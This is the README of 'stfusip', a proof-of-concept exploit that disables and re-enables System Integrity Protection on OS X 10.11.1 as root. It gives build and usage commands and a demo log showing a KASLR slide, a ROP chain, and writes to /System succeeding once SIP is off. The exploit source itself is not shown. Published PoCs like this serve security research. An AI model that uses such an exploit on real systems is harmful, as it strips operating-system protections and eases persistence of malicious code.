System Integrity Protection (SIP) bypass for OSX 10.11.1 - 10.11.2 - 10.11.3
# stfusip

## credits & thanks

- jndok – a.k.a. myself, for code and exploit.
- qwertyoruiop – for bug and related help! go follow him on Twitter :)

## compile

Simply run `make` inside the stfusip folder. If you encounter linking problems, check that you have capstone installed on your system. There is a flag inside the Makefile that specifies capstone's include directory; edit it if capstone is located elsewhere on your system!

If you don't have capstone installed, do:

```sh
brew install capstone
```

and you should be set.

## usage

So, stfusip is a simple PoC for disabling/enabling SIP, a.k.a. System Integrity Protection, a.k.a. rootless, on OSX 10.11.1. The bug could theoretically still work on 10.11.2, but I am really not sure.

Super easy to use; it needs to be run as root:

```sh
sudo ./stfusip disable   # this disables SIP
sudo ./stfusip enable    # this enables SIP
```

Here's a demo output:

```
jndoks-Mac-Pro:stfusip jndok$ sudo su
sh-3.2# whoami
root
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# ./stfusip disable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbff56c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

[-] System Integrity Protection (SIP) has been disabled.
sh-3.2# touch /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
0 -rw-r--r--   1 root  wheel     0 Dec  7 15:46 yolo
sh-3.2# rm -rf /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
sh-3.2# ./stfusip enable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbfff6c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

touch: /System/test: Operation not permitted
[+] System Integrity Protection (SIP) has been enabled.
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# exit
```